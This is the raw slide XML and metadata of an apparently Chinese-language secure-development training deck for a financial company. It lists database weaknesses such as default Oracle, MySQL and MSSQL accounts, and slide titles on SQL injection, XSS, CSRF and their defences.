                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>5432</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="矩形 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1852210" y="3933056"/>
              <a:ext cx="4684384" cy="1276286"/>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缺省用户名和密码</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>Oracle</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>启用</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>sys</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>system</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>sysman</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>、</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>scott</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>等</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>700</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>多个缺省用户</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>MySQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>本机的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>用户可以没有口令</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>MSSQL</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>默认启用 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>sa</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>帐号，并密码简单，例如</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="1050" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>sa</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="矩形 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1835696" y="5373216"/>
              <a:ext cx="1573546" cy="328835"/>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口令复杂度不高</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="矩形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3563888" y="5373216"/>
              <a:ext cx="1573546" cy="328835"/>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权限细粒度不够</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="矩形 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5312576" y="5373216"/>
              <a:ext cx="2470881" cy="328835"/>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敏感数据明文存储导致泄密</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="矩形 56"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1835696" y="5805264"/>
              <a:ext cx="1573546" cy="328835"/>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缓冲区溢出漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="矩形 57"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3550514" y="5769595"/>
              <a:ext cx="1573546" cy="328835"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent2">
                <a:lumMod val="7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lIns="59400" tIns="29700" rIns="59400" bIns="29700" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="600710">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1050" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>权限提升漏洞</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41548740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E4Xymc3SkuEiQS8A1Y1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E4Xymc3SkuEiQS8A1Y1lg"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="3-开发安全技术">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6517</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>全屏显示(4:3)</PresentationFormat>
  <Paragraphs>1022</Paragraphs>
  <Slides>75</Slides>
  <Notes>56</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75</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="95" baseType="lpstr">
      <vt:lpstr>FrutigerNext LT Regular</vt:lpstr>
      <vt:lpstr>Kaiti SC Regular</vt:lpstr>
      <vt:lpstr>Lucida Grande</vt:lpstr>
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>方正中等线简体</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>楷体</vt:lpstr>
      <vt:lpstr>楷体_GB2312</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>Times</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>3-开发安全技术</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>中再安全开发培训</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>市场环境与新技术驱动金融软件开发的变革</vt:lpstr>
      <vt:lpstr>网络安全已经不容忽视</vt:lpstr>
      <vt:lpstr>金融开发安全存在的问题？</vt:lpstr>
      <vt:lpstr>如果在应用需求确立与设计之初就开始做安全成本更低</vt:lpstr>
      <vt:lpstr>Web应用架构安全剖析</vt:lpstr>
      <vt:lpstr>WEB应用部署架构</vt:lpstr>
      <vt:lpstr>WEB应用架构知识体系</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>中再应用检测第一阶段、第二阶段漏洞</vt:lpstr>
      <vt:lpstr>XX应用检测第一阶段、第二阶段漏洞</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>  SQL注入(SQL Injection)</vt:lpstr>
      <vt:lpstr>SQL 注入：数字参数</vt:lpstr>
      <vt:lpstr>SQL 注入：数字参数</vt:lpstr>
      <vt:lpstr>SQL注入：规避SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入：安全编码</vt:lpstr>
      <vt:lpstr>SQL注入：数据库加固</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>跨站脚本漏洞(XSS) </vt:lpstr>
      <vt:lpstr>XSS:两种类型总结</vt:lpstr>
      <vt:lpstr>跨站脚本漏洞(XSS) </vt:lpstr>
      <vt:lpstr>XSS漏洞：过滤是最低效的方法</vt:lpstr>
      <vt:lpstr>XSS漏洞：转义</vt:lpstr>
      <vt:lpstr>XSS漏洞：防范措施总结</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>文件上传漏洞</vt:lpstr>
      <vt:lpstr>文件上传漏洞</vt:lpstr>
      <vt:lpstr>文件上传漏洞：解决方案</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>权限控制不当</vt:lpstr>
      <vt:lpstr>权限控制不当</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>硬编码密码</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>口令管理</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>敏感信息泄露</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>弱加密</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>短信轰炸</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>验证码可暴力破解</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>密码明文传输</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>验证码可绕过或重复使用</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>任意密码登录</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>跨站请求伪造（XSRF ）</vt:lpstr>
      <vt:lpstr>跨站请求伪造（XSRF）</vt:lpstr>
      <vt:lpstr>CSRF：案例1</vt:lpstr>
      <vt:lpstr>CSRF：案例2</vt:lpstr>
      <vt:lpstr>CSRF：规避方法</vt:lpstr>
      <vt:lpstr>会话标识未更新</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>URL重定向攻击</vt:lpstr>
      <vt:lpstr>URL重定向攻击</vt:lpstr>
      <vt:lpstr>启用不安全的WebDAV模块</vt:lpstr>
      <vt:lpstr>批量请求攻击</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>输入数据验证</vt:lpstr>
      <vt:lpstr>页面注释修改</vt:lpstr>
      <vt:lpstr>禁止页面缓存</vt:lpstr>
      <vt:lpstr>采用预编译语句的SQL实现</vt:lpstr>
      <vt:lpstr>文件上传校验</vt:lpstr>
      <vt:lpstr>目录</vt:lpstr>
      <vt:lpstr>WEB应用服务器配置</vt:lpstr>
      <vt:lpstr>WEB应用配置403、404、500通用处理页面</vt:lpstr>
      <vt:lpstr>权限管理</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created xsi:type="dcterms:W3CDTF">2015-11-25T06:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-11-26T06:08:06Z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